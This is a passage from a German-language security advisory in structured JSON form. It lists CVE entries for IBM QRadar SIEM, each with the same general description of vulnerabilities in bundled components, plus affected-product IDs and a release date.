"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3611"
},
{
"cve": "CVE-2023-3772",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3772"
},
{
"cve": "CVE-2023-3812",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-3812"
},
{
"cve": "CVE-2023-38546",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-38546"
},
{
"cve": "CVE-2023-40283",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-40283"
},
{
"cve": "CVE-2023-4128",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4128"
},
{
"cve": "CVE-2023-4132",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4132"
},
{
"cve": "CVE-2023-4155",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4155"
},
{
"cve": "CVE-2023-4206",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4206"
},
{
"cve": "CVE-2023-4207",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4207"
},
{
"cve": "CVE-2023-4208",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4208"
},
{
"cve": "CVE-2023-42753",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-42753"
},
{
"cve": "CVE-2023-45862",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-45862"
},
{
"cve": "CVE-2023-45871",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-45871"
},
{
"cve": "CVE-2023-46218",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-46218"
},
{
"cve": "CVE-2023-4622",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4622"
},
{
"cve": "CVE-2023-4623",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4623"
},
{
"cve": "CVE-2023-46813",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-46813"
},
{
"cve": "CVE-2023-4732",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4732"
},
{
"cve": "CVE-2023-4921",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-4921"
},
{
"cve": "CVE-2023-50387",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-50387"
},
{
"cve": "CVE-2023-50868",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-50868"
},
{
"cve": "CVE-2023-51042",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-51042"
},
{
"cve": "CVE-2023-51043",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-51043"
},
{
"cve": "CVE-2023-5178",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-5178"
},
{
"cve": "CVE-2023-52425",
"notes": [
{
"category": "description",
"text": "In IBM QRadar SIEM existieren mehrere Schwachstellen. Diese bestehen in mehreren Komponenten und Subsystemen wie Oniguruma, Python oder dem Linux-Kernel und sind unter anderem auf mehrere sicherheitsrelevante Probleme wie Use-after-free-Verhalten, unsachgem\u00e4\u00dfe Grenzwert\u00fcberpr\u00fcfung oder unsachgem\u00e4\u00dfe Eingabevalidierung zur\u00fcckzuf\u00fchren. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, einen Denial-of-Service-Zustand herbeizuf\u00fchren, vertrauliche Informationen offenzulegen, Dateien zu manipulieren, seine Privilegien zu erweitern, einen Cross-Site-Scripting-Angriff (XSS) durchzuf\u00fchren oder einen nicht n\u00e4her spezifizierten Angriff zu starten. Einige dieser Schwachstellen erfordern Benutzerinteraktion, um erfolgreich ausgenutzt zu werden."
}
],
"product_status": {
"known_affected": [
"T023574",
"T034673"
]
},
"release_date": "2024-05-09T22:00:00.000+00:00",
"title": "CVE-2023-52425"
},
{
"cve": "CVE-2023-5633",
"notes": [
{
"category": "description",
